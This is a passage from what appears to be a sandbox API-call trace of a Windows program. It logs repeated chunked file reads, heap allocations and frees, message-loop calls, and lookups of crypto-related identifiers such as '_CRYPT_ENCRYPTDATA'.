lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.045] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.047] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.049] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.052] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.055] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.057] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0190.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0190.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0190.060] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0190.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0190.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6e020 [0190.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0190.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0190.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0190.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0190.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0190.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0190.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0190.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0190.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0190.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe53020 [0190.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6e020 | out: hHeap=0x970000) returned 1 [0190.252] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0190.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0190.252] TranslateMessage (lpMsg=0x8cf708) returned 0 [0190.252] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0190.252] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0190.252] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0190.252] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0190.252] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0190.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0190.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0190.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0190.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0190.253] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6d020 [0190.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0190.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6d020 | out: hHeap=0x970000) returned 1 [0190.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0190.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0190.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0190.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0190.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0190.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0190.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0190.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0190.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0190.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0190.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0190.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0190.324] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0190.324] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0190.324] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0190.324] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf61020 [0190.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0190.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0190.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0190.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0190.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0190.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ce8 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0190.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bb8 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0190.423] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0190.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x107d020 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0190.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0190.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0190.445] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0190.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0190.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0190.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0190.445] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0190.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0190.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0190.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0190.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0190.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0190.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0190.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0190.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0190.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0190.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0190.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0190.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0190.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0190.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0190.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0190.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0190.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0190.449] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0190.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0190.449] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0190.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0190.450] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0190.450] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0190.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0190.450] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0190.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0190.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0190.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0190.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0190.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0190.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0190.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0190.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0190.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0190.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0190.451] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0190.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0190.451] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0190.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0190.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0190.451] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0190.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0190.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0190.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0190.452] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0190.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0190.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0190.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0190.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.452] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0190.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0190.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0190.514] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0190.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0190.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0190.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0190.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0190.514] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0190.514] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0190.514] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0190.514] HeapFree (in: hHeap=0x970000, 